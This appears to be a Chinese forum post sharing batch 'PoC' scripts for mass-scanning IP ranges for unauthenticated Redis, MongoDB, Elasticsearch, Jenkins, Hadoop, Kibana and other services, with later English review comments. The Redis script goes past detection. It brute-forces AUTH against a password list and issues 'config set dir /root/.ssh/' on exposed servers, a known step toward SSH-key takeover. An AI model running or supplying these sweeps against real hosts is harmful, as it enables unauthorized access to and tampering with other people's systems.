一般来说我们检验是否存在漏洞,都是一个个的检验。但是如果遇到了目标有很多,这个怎么办呢?
这里提供2个思路
一、msf的扫描
找到
1.1、指定文件ip扫描
192.168.100.222
192.168.100.223
192.168.100.224
192.168.100.225
192.168.100.226
这样一行一行写入文本
1.2、指定网络段ip扫描
一般都是扫C段,也就是/24就行了,尽量不要去搞A段(/8)、B段(/16),太多了
二、楼主这里提供一些批量poc
import socket
import pymongo
import requests
import ftplib
from tqdm import tqdm
import sys
from concurrent.futures import ThreadPoolExecutor
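def redis(ip):
    """Send ``INFO`` to ``ip``:6379 and print a report line if the reply names a Redis version.

    Args:
        ip: Host to probe; a hostname or dotted address accepted by
            ``socket.create_connection``.

    Side effects:
        Prints ``<ip>:6379 redis未授权`` when ``redis_version`` appears in the
        first 1024 bytes of the decoded reply, and advances the module-level
        progress bar ``bar`` exactly once on every path.

    Why this shape: the original called ``socket.setdefaulttimeout`` (a
    process-wide value that every worker thread rewrote concurrently) and only
    closed the socket on the success path, so each timed-out or refused target
    leaked a descriptor. The timeout is now per-socket and ``with`` closes it
    on every path. Exceptions are still swallowed deliberately: an unreachable
    host is the normal case during a sweep.
    """
    try:
        with socket.create_connection((ip, 6379), timeout=5) as s:
            s.sendall(bytes("INFO\r\n", 'UTF-8'))
            result = s.recv(1024).decode()
        if "redis_version" in result:
            print(ip + ":6379 redis未授权")
    except Exception:
        pass
    finally:
        bar.update(1)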
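def mongodb(ip):
    """Call ``list_database_names()`` on ``ip``:27017 and print a report line if it succeeds.

    Args:
        ip: Host to probe.

    Side effects:
        Prints ``<ip>:27017 mongodb未授权`` when the database list comes back
        without an error, and advances the module-level progress bar ``bar``
        once on every path.

    Why this shape: ``MongoClient`` connects lazily, so ``socketTimeoutMS``
    alone did not bound the call -- connecting and server selection have their
    own timeouts, which the original left at the library defaults and which can
    hold a worker thread much longer than the 4 s intended. All three are set
    here. ``with`` closes the client on every path (the original closed it
    only on success), and the unused ``dbname`` local is gone. Errors are
    swallowed as in the other probes.
    """
    try:
        with pymongo.MongoClient(
            ip,
            27017,
            socketTimeoutMS=4000,
            connectTimeoutMS=4000,
            serverSelectionTimeoutMS=4000,
        ) as conn:
            conn.list_database_names()
        print(ip + ":27017 mongodb未授权")
    except Exception:
        pass
    finally:
        bar.update(1)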
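def memcached(ip):
    """Send ``stats`` to ``ip``:11211 and print a report line if the reply contains ``version``.

    Args:
        ip: Host to probe.

    Side effects:
        Prints ``<ip>:11211 memcached未授权`` when ``version`` appears in the
        first 1024 decoded bytes of the reply; advances the module-level
        progress bar ``bar`` once on every path.

    Why this shape: as with the other socket probes, the original mutated the
    process-wide default timeout from worker threads and closed the socket only
    on success. The timeout is now per-socket and ``with`` guarantees the
    close. Exceptions are swallowed deliberately (best-effort sweep).
    """
    try:
        with socket.create_connection((ip, 11211), timeout=5) as s:
            s.sendall(bytes('stats\r\n', 'UTF-8'))
            reply = s.recv(1024).decode()
        if 'version' in reply:
            print(ip + ":11211 memcached未授权")
    except Exception:
        pass
    finally:
        bar.update(1)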
def elasticsearch(ip):
    """Fetch ``/_cat`` from ``ip``:9200 and print a report line if the endpoint index is served.

    Args:
        ip: Host to probe.

    Side effects:
        Prints ``<ip>:9200 elasticsearch未授权`` when ``/_cat/master`` appears
        in the UTF-8-decoded body; advances the module-level progress bar
        ``bar`` once on every path. Any exception (connection error, the 5 s
        timeout, a body that is not valid UTF-8) is swallowed.
    """
    try:
        url = "http://{}:9200/_cat".format(ip)
        body = requests.get(url, timeout=5).content.decode()
        if '/_cat/master' in body:
            print(ip + ":9200 elasticsearch未授权")
    except Exception:
        pass
    finally:
        bar.update(1)
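def zookeeper(ip):
    """Send the ``envi`` four-letter word to ``ip``:2181 and print a report line if the reply contains ``Environment``.

    Args:
        ip: Host to probe.

    Side effects:
        Prints ``<ip>:2181 zookeeper未授权`` on a match; advances the
        module-level progress bar ``bar`` once on every path.

    Why this shape: the original used a bare ``except`` (which also swallows
    ``KeyboardInterrupt`` and ``SystemExit``, making Ctrl-C unreliable),
    mutated the process-wide socket timeout from worker threads, and leaked
    the socket whenever ``connect``/``recv`` raised. The timeout is now
    per-socket, ``with`` closes on every path, and only ``Exception`` is
    swallowed.
    """
    try:
        with socket.create_connection((ip, 2181), timeout=5) as s:
            s.sendall(bytes('envi', 'UTF-8'))
            data = s.recv(1024).decode()
        if 'Environment' in data:
            print(ip + ":2181 zookeeper未授权")
    except Exception:
        pass
    finally:
        bar.update(1)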
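def ftp(ip):
    """Attempt an anonymous login on ``ip``:21 and print a report line if the server accepts it.

    Args:
        ip: Host to probe.

    Side effects:
        Prints ``<ip>:21 FTP未授权`` when ``login`` returns without raising;
        advances the module-level progress bar ``bar`` once on every path.

    Why this shape: the original called ``ftplib.FTP.connect(ip, 21,
    timeout=5)`` on the class rather than on an instance, so ``ip`` was bound
    as ``self`` and the call raised before any connection was attempted; the
    broad ``except`` hid that, so this probe never reported anything. The
    local was also named ``ftp``, shadowing this function. ``with`` now quits
    and closes the control connection on every path.
    """
    try:
        with ftplib.FTP() as client:
            client.connect(ip, 21, timeout=5)
            client.login('anonymous', 'Aa@12345678')
        print(ip + ":21 FTP未授权")
    except Exception:
        pass
    finally:
        bar.update(1)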
def CouchDB(ip):
    """Fetch ``/_utils/`` from ``ip``:5984 and print a report line if the CouchDB UI is served.

    Args:
        ip: Host to probe.

    Side effects:
        Prints ``<ip>:5984 CouchDB未授权`` when ``couchdb-logo`` appears in the
        UTF-8-decoded body; advances the module-level progress bar ``bar``
        once on every path. Exceptions (connection errors, the 5 s timeout,
        undecodable bodies) are swallowed.
    """
    try:
        url = "http://{}:5984/_utils/".format(ip)
        body = requests.get(url, timeout=5).content.decode()
        if 'couchdb-logo' in body:
            print(ip + ":5984 CouchDB未授权")
    except Exception:
        pass
    finally:
        bar.update(1)
def docker(ip):
    """Fetch ``/version`` from ``ip``:6071 and print a report line if the body contains ``ApiVersion``.

    Args:
        ip: Host to probe.

    Side effects:
        Prints ``<ip>:6071 docker api未授权`` on a match; advances the
        module-level progress bar ``bar`` once on every path. Exceptions are
        swallowed.

    NOTE(review): port 6071 is hard-coded as the author wrote it -- confirm it
    matches the deployment being checked before trusting a silent result.
    """
    try:
        url = "http://{}:6071/version".format(ip)
        body = requests.get(url, timeout=5).content.decode()
        if 'ApiVersion' in body:
            print(ip + ":6071 docker api未授权")
    except Exception:
        pass
    finally:
        bar.update(1)
def Hadoop(ip):
    """Fetch ``/dfshealth.html`` from ``ip``:50070 and print a report line if ``hadoop.css`` is referenced.

    Args:
        ip: Host to probe.

    Side effects:
        Prints ``<ip>:50070 Hadoop未授权`` on a match; advances the
        module-level progress bar ``bar`` once on every path. Exceptions are
        swallowed.
    """
    try:
        url = "http://{}:50070/dfshealth.html".format(ip)
        body = requests.get(url, timeout=5).content.decode()
        if 'hadoop.css' in body:
            print(ip + ":50070 Hadoop未授权")
    except Exception:
        pass
    finally:
        bar.update(1)
def Jenkins(ip):
    """Fetch ``/manage`` from ``ip``:8080 and print a report line if the body contains ``Jenkins``.

    Args:
        ip: Host to probe.

    Side effects:
        Prints ``<ip>:8080 Jenkins api未授权`` on a match; advances the
        module-level progress bar ``bar`` once on every path. Exceptions are
        swallowed.

    NOTE(review): the test is a bare substring match, so any page mentioning
    the word ``Jenkins`` -- including one that still demands a login --
    counts as a hit. Treat the output as a lead to verify, not a confirmation.
    """
    try:
        url = "http://{}:8080/manage".format(ip)
        body = requests.get(url, timeout=5).content.decode()
        if 'Jenkins' in body:
            print(ip + ":8080 Jenkins api未授权")
    except Exception:
        pass
    finally:
        bar.update(1)
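if __name__ == '__main__':
    # Entry point: read one target per line from the file named on the command
    # line and submit every probe for every target to a thread pool. ``bar`` is
    # deliberately a module-level name -- each probe's ``finally`` calls
    # ``bar.update(1)``.
    if len(sys.argv) == 1:
        print("Usage:python3 unauthorized-check.py url.txt")
        # The original fell through to ``sys.argv[1]`` and died with an
        # IndexError right after printing the usage line.
        sys.exit(1)
    path = sys.argv[1]
    with open(path, "r", encoding='UTF-8') as f:
        # Blank lines used to be submitted as the empty-string target.
        targets = [raw.strip() for raw in f if raw.strip()]
    # Keep the submission order of the original; one tuple so the progress
    # total and the loop cannot drift apart again (the original sized the bar
    # for 9 probes but submitted 10).
    checks = (
        redis,
        Hadoop,
        docker,
        CouchDB,
        ftp,
        zookeeper,
        elasticsearch,
        memcached,
        mongodb,
        Jenkins,
    )
    bar = tqdm(total=len(targets) * len(checks))
    with ThreadPoolExecutor(1000) as pool:
        for target in targets:
            for probe in checks:
                pool.submit(probe, target)
    bar.close()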
楼主这里试一试elasticsearch的未授权poc
还有其他的一些单独的批量poc,楼主也放一下。(这里注意使用py2)
Redis的未授权批量poc
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import socket
import sys
# Candidate passwords tried, in this order, when the server answers INFO with
# an "Authentication" error (see check()). Order matters only for which entry
# is reported first.
PASSWORD_DIC = [
    'redis',
    'root',
    'oracle',
    'password',
    'p@aaw0rd',
    'abc123!',
    '123456',
    'admin',
]
def check(ip, port, timeout):
    # Probe one Redis endpoint. Sends INFO; if the server answers without
    # requiring AUTH it is reported and a CONFIG SET is issued (see the note
    # below); if the reply mentions "Authentication", each entry of
    # PASSWORD_DIC is tried with AUTH on a fresh connection.
    #
    # ip      -- host to probe (str)
    # port    -- TCP port; coerced with int() before connecting
    # timeout -- seconds, installed as the process-wide socket default
    #
    # Python 2 only: the print statements and the str-vs-bytes socket calls
    # do not run under Python 3. None of the sockets opened here is closed;
    # they are released only when garbage-collected.
    try:
        socket.setdefaulttimeout(timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, int(port)))
        s.send("INFO\r\n")
        result = s.recv(1024)
        if "redis_version" in result:
            print u"%s:%s未授权访问"%(ip,port)
            # NOTE(review): from here on this is no longer a read-only check.
            # CONFIG SET changes the running server's persistence directory on
            # the target and leaves a server-side state change (and a log
            # entry) behind. A detection-only script should stop at the INFO
            # reply above.
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, int(port)))
            s.send("config set dir /root/.ssh/\r\n")
            content = s.recv(1024)
            print(content)
            if "OK" in content:
                print u"%s:%s .ssh目录存在且权限足够"%(ip,port)
            elif "error" in content:
                print u"%s:%s 无法写入"%(ip,port)
        elif "Authentication" in result:
            # Server demands AUTH. One new connection per candidate; every
            # failed attempt is visible to the server's own logging, which is
            # the detection point for this behaviour. The loop does not stop
            # after a success, so later entries are still tried.
            for pass_ in PASSWORD_DIC:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("AUTH %s\r\n" %(pass_))
                result = s.recv(1024)
                if '+OK' in result:
                    print u"%s:%s存在弱口令,密码:%s" % (ip,port,pass_)
    except Exception, e:
        # Any network or protocol error is printed and then swallowed so the
        # caller's loop over targets keeps going.
        print e
        pass
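if __name__ == '__main__':
    # Entry point: one target per line from the fixed input file, each probed
    # on port 6380 with a 10 s timeout (both values as the author chose them;
    # note the Python 3 script above uses 6379).
    #
    # ``with`` closes the file even if check() raises, which the original's
    # trailing doc.close() did not guarantee, and blank lines are skipped --
    # the original passed '' as the host for every empty line.
    with open("hello_world.txt", "r") as doc:
        for ip in doc:
            ip = ip.strip()
            if ip:
                check(ip, 6380, timeout=10)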
Kibana的未授权批量poc
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import requests
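def Hadoop_check(ip, port, timeout):
    """Fetch ``/app/kibana`` from ``ip``:``port`` and print a hit line if that path appears in the body.

    Despite the name -- kept because the ``__main__`` block below calls it --
    this is the Kibana probe, not the Hadoop one.

    Args:
        ip: Host to probe (str; concatenated into the hit line).
        port: TCP port; formatted with ``str()``.
        timeout: Seconds passed to ``requests.get``. The original declared it
            but never used it, so a silent host could block the loop for the
            library default, which is no timeout at all.

    Side effects:
        Prints the URL and the raw body for every target, then
        ``[+++++] Kibana [+++++]: <ip>:<port>`` on a hit. Only ``Exception``
        is swallowed now, so Ctrl-C still stops the sweep (the bare ``except``
        also ate ``KeyboardInterrupt``). ``response.text`` replaces
        ``.content`` in the substring test and the prints use call syntax, so
        the body runs unchanged under both Python 2 and 3 (under 3
        ``.content`` is bytes and the test raised ``TypeError``).
    """
    try:
        url = "http://" + str(ip) + ":" + str(port) + "/app/kibana"
        response = requests.get(url, timeout=timeout)
        print(url)
        print(response.content)
        if "/app/kibana" in response.text:
            print('[+++++] Kibana [+++++]: ' + ip + ':' + str(port))
    except Exception:
        pass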
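if __name__ == '__main__':
    # Entry point: one target per line from ip.txt, each probed on port 5601
    # with a 5 s timeout. ``with`` closes the file even if the probe raises
    # (the original's trailing doc.close() did not), and blank lines are
    # skipped instead of being probed as the empty host ''.
    with open("ip.txt", "r") as doc:
        for ip in doc:
            ip = ip.strip()
            if ip:
                Hadoop_check(ip, 5601, 5)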
Hadoop的未授权批量poc
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import requests
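def Hadoop_check(ip, port, timeout):
    """POST to ``/cluster`` on ``ip``:``port`` and print a hit line if ``/cluster/cluster`` appears in the body.

    Args:
        ip: Host to probe (str; concatenated into the hit line).
        port: TCP port; formatted with ``str()``.
        timeout: Seconds passed to ``requests.post``. The original declared it
            but never used it, so an unresponsive host could block the loop
            indefinitely (the library default is no timeout).

    Side effects:
        Prints ``[+++++] Hadoop [+++++]: <ip>:<port>`` on a hit. Only
        ``Exception`` is swallowed, so Ctrl-C still stops the sweep.
        ``response.text`` replaces ``.content`` in the substring test and the
        print uses call syntax, so the body runs under both Python 2 and 3.
    """
    try:
        url = "http://" + str(ip) + ":" + str(port) + "/cluster"
        response = requests.post(url, timeout=timeout)
        if "/cluster/cluster" in response.text:
            print('[+++++] Hadoop [+++++]: ' + ip + ':' + str(port))
    except Exception:
        pass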
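if __name__ == '__main__':
    # Entry point: one target per line from ip.txt, each echoed and then probed
    # on port 8088 with a 5 s timeout. ``with`` closes the file even if the
    # probe raises (the original's trailing doc.close() did not), and blank
    # lines are skipped instead of being probed as the empty host ''.
    with open("ip.txt", "r") as doc:
        for ip in doc:
            ip = ip.strip()
            if ip:
                print(ip)
                Hadoop_check(ip, 8088, 5)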
Elasticsearch的未授权批量poc
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import requests
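def Elasticsearch_check(ip, port, timeout):
    """Fetch ``/_cat`` from ``ip``:``port`` and print a hit line if ``/_cat/master`` appears in the body.

    Args:
        ip: Host to probe (str; concatenated into the hit line).
        port: TCP port; formatted with ``str()``.
        timeout: Seconds passed to ``requests.get``. The original declared it
            but never used it, so an unresponsive host could block the loop
            indefinitely (the library default is no timeout).

    Side effects:
        Prints ``[+++++] Elasticsearch: <ip>:<port>`` on a hit. Only
        ``Exception`` is swallowed, so Ctrl-C still stops the sweep.
        ``response.text`` replaces ``.content`` in the substring test and the
        print uses call syntax, so the body runs under both Python 2 and 3.
    """
    try:
        url = "http://" + str(ip) + ":" + str(port) + "/_cat"
        response = requests.get(url, timeout=timeout)
        if "/_cat/master" in response.text:
            print('[+++++] Elasticsearch: ' + ip + ':' + str(port))
    except Exception:
        pass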
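if __name__ == '__main__':
    # Entry point: one target per line from ip.txt, each probed on port 9200
    # with a 5 s timeout. ``with`` closes the file even if the probe raises
    # (the original's trailing doc.close() did not), and blank lines are
    # skipped instead of being probed as the empty host ''.
    with open("ip.txt", "r") as doc:
        for ip in doc:
            ip = ip.strip()
            if ip:
                Elasticsearch_check(ip, 9200, 5)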